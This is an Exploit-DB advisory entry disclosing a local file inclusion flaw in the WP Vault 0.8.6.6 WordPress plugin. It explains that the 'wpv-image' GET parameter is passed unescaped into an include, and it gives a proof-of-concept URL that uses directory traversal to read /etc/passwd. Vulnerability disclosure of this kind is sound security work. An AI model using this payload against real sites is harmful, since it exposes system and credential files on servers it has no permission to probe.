WordPress Plugin WP Vault 0.8.6.6 - Local File Inclusion

Author: Lenon Leite
type: webapps
platform: php
port: 
date_added: 2016-11-30 
date_updated: 2016-11-30 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-11-30-at-191812.png 
application_url: http://www.exploit-db.comwp-vault.0.8.6.6.zip

# Exploit Title:  WP Vault 0.8.6.6 – Plugin WordPress – Local File Inclusion
# Date: 28/11/2016
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/wp-vault/
# Software Link: https://wordpress.org/plugins/wp-vault/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 0.8.6.6
# Tested on: Ubuntu 14.04

1 - Description:

$_GET[“wpv-image”] is not escaped in include file.

http://lenonleite.com.br/en/blog/2016/11/30/wp-vault-0-8-6-6-local-file-inclusion/


2 - Proof of Concept:

http://Target/?wpv-image=[LFI]

http://Target/?wpv-image=../../../../../../../../../../etc/passwd

3 - Timeline:

12/11/2016 - Discovered
12/11/2016 - vendor not found